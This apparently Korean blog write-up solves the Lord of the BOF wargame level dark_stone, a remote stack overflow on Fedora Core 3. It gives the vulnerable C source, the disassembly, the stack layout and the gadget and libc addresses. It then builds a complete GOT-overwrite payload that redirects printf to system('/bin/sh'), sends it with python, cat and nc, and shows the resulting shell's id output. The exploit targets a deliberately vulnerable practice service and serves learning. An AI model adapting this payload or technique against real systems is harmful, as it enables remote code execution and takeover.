[5] evil_wizard -> dark_stone ( GOT Overwriting & Remote BOF )

2017. 12. 1. 20:08 — SystemHacking/Fedora Castle



evil_wizard / get down like that

이전 문제와 푸는 방법은 같지만 Remote 라는 점만 다르다 ( cat 과 nc를 이용한 풀이 )


[ dark_stone.c ]

 
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark_stone
        - Remote BOF on Fedora Core 3
        - hint : GOT overwriting again
        - port : TCP 8888
*/
 
#include <stdio.h>
#include <string.h>
 
// magic potion for you
// Deliberately planted "pop; pop; ret" gadget: it discards the two stack slots
// above the return address and then returns into whatever address follows them.
// It is never called by main(); it only exists so the GOT-overwrite chain in the
// writeup below can skip the two arguments of each PLT call. A real program would
// not ship such a gadget -- it is part of the challenge, not of the bug itself.
void pop_pop_ret(void)
{
        // Basic asm (no operands): GCC treats it as volatile, so the three
        // instructions are emitted in this order and are not dropped.
        asm("pop %eax");
        asm("pop %eax");
        asm("ret");
}
 
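/*
 * Challenge entry point: reads one line from stdin and copies it, unbounded,
 * into a 256-byte stack buffer. Two counter-measures are built in (the saved
 * frame pointer is preserved across the copy, and the stack above the input
 * plus one fixed memory region are zeroed) so that only the return address
 * can be taken over.
 *
 * Returns 0. The listing on this page had two garbled lines (memcpy and the
 * second memset); they are restored here from the disassembly shown below
 * (memcpy(saved_sfp, buffer+264, 4)) and from the tokens left in the garble.
 * The address arithmetic assumes 32-bit pointers, as on the original target.
 */
int main(void)
{
        char buffer[256];
        char saved_sfp[4];
        int length;
        char temp[1024];

        printf("dark_stone : how fresh meat you are!\n");
        printf("you : ");
        fflush(stdout);

        // give me a food
        // Up to 1023 bytes land in temp; buffer is only 256 bytes, so the
        // strcpy() further down is where the overflow happens.
        fgets(temp, 1024, stdin); // overflow happens here!

        // for disturbance RET sleding
        // The input length decides where the zero-fill below starts.
        length = strlen(temp);

        // save sfp
        // buffer+264 is the saved-ebp slot (256 bytes of buffer plus 8 bytes of
        // padding, see lea eax,[ebp-264] in the disassembly). It is copied out so
        // the overflow cannot change the frame pointer.
        memcpy(saved_sfp, buffer+264, 4);

        // overflow!!
        // Unbounded copy of up to 1023 bytes into a 256-byte buffer. In real code
        // this is the line to fix, e.g. snprintf(buffer, sizeof buffer, "%s", temp).
        strcpy(buffer, temp);

        // restore sfp
        memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        // Zero everything from the end of the copied input up to address
        // 0xff000000, so nothing placed beyond the string survives on the stack.
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

        // buffer cleaning
        // Wipe the fixed region 0xf6ffe000-0xf7000000; the cast makes the
        // integer-to-pointer conversion explicit.
        memset((void *)0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

        printf("%s\n", buffer);
        return 0;
}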




[ 소스코드 디버깅 ]

0x080484f8 <main+0>: push   ebp

0x080484f9 <main+1>: mov    ebp,esp

0x080484fb <main+3>: sub    esp,0x518

0x08048501 <main+9>: and    esp,0xfffffff0

....

0x0804851f <main+39>: call   0x8048408 <_init+104> printf()

0x08048524 <main+44>: add    esp,0x10

0x08048527 <main+47>: sub    esp,0xc

0x0804852a <main+50>: push   0x804873e

0x0804852f <main+55>: call   0x8048408 <_init+104> printf()

0x08048534 <main+60>: add    esp,0x10

0x08048537 <main+63>: sub    esp,0xc

0x0804853a <main+66>: push   ds:0x8049868

0x08048540 <main+72>: call   0x80483c8 <_init+40> fflush()

0x08048545 <main+77>: add    esp,0x10

0x08048548 <main+80>: sub    esp,0x4

....

0x0804854b <main+83>: push   ds:0x804986c

0x08048551 <main+89>: push   0x400

0x08048556 <main+94>: lea    eax,[ebp-1304]

0x0804855c <main+100>: push   eax

0x0804855d <main+101>: call   0x80483d8 <_init+56> fgets(temp,1024,stdin)

....

0x08048580 <main+136>: push   0x4

0x08048582 <main+138>: lea    eax,[ebp-264]

0x08048588 <main+144>: add    eax,0x108

0x0804858d <main+149>: push   eax

0x0804858e <main+150>: lea    eax,[ebp-268]

0x08048594 <main+156>: push   eax

0x08048595 <main+157>: call   0x8048418 <_init+120> memcpy(saved_sfp,buffer+264,4)

0x0804859a <main+162>: add    esp,0x10

0x0804859d <main+165>: sub    esp,0x8

....

0x080485a0 <main+168>: lea    eax,[ebp-1304]

0x080485a6 <main+174>: push   eax

0x080485a7 <main+175>: lea    eax,[ebp-264]

0x080485ad <main+181>: push   eax

0x080485ae <main+182>: call   0x8048438 <_init+152> strcpy(buffer,temp)

....                           strcpy's PLT

0x0804861a <main+290>: add    esp,0x10

0x0804861d <main+293>: sub    esp,0x8

0x08048620 <main+296>: lea    eax,[ebp-264]

0x08048626 <main+302>: push   eax

0x08048627 <main+303>: push   0x8048745

0x0804862c <main+308>: call   0x8048408 <_init+104> printf("%s\n",buffer)

  printf's PLT

0x08048631 <main+313>: add    esp,0x10

0x08048634 <main+316>: leave  

0x08048635 <main+317>: ret    

0x08048636 <main+318>: nop    

0x08048637 <main+319>: nop  


[ Stack ]

temp                1024byte

length                4byte

dummy                8byte

saved_sfp            4byte


buffer                256byte

dummy                8byte

saved ebp            0xfee87448 (고정)

saved eip


[ 사용할 주소 ]

[evil_wizard@Fedora_1stFloor tmp]$ ./find

"/bin/sh" is at 0x833603

printf /bin/sh

strcpy() plt : 0x08048438 

&pop_pop_ret : 0x080484f3

&system() : 0x007507c0

printf() plt : 0x08048408 


[ PLT & GOT 계산 ]

0x0804851f <main+39>: call   0x8048408 <_init+104> printf()

(gdb) x/3i 0x8048408           printf's PLT

0x8048408 <_init+104>: jmp    ds:0x804984c

0x804840e <_init+110>: push   0x20

0x8048413 <_init+115>: jmp    0x80483b8 <_init+24>

(gdb) x/x 0x804984c

0x804984c <_GLOBAL_OFFSET_TABLE_+28>: 0x0804840e     printf's GOT


0x804984c 위치의 값을 &system()로 변조한다



[ 변조할 문자 ]

* 0x80484d0 <frame_dummy+12>:     0xc0    0x74    0x19    0xb8

  0x80484d4 <frame_dummy+16>:     0x00 


* 0x8048364 <__libc_utmp_lock+125851260>: 0x07 0x01 0x00

* 0x80482b4 <__libc_utmp_lock+125851084>: 0x75 0x74 0x00 0x66

* 0x8048366 <__libc_utmp_lock+125851262>: 0x00


[ Payload ]

[evil_wizard@Fedora_1stFloor ~]$ (python -c 'print "A" * 268 + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4c\x98\x04\x08" + "\xd0\x84\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4d\x98\x04\x08" + "\x64\x83\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4e\x98\x04\x08" + "\xb4\x82\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4f\x98\x04\x08" + "\x66\x83\x04\x08" + "\x08\x84\x04\x08" + "AAAA" + "\x03\x36\x83\x00" + "\x00\x00\x00\x0a"';cat) | nc localhost 8888

dark_stone : how fresh meat you are!

you :

id

uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t

my-pass

euid = 505

let there be light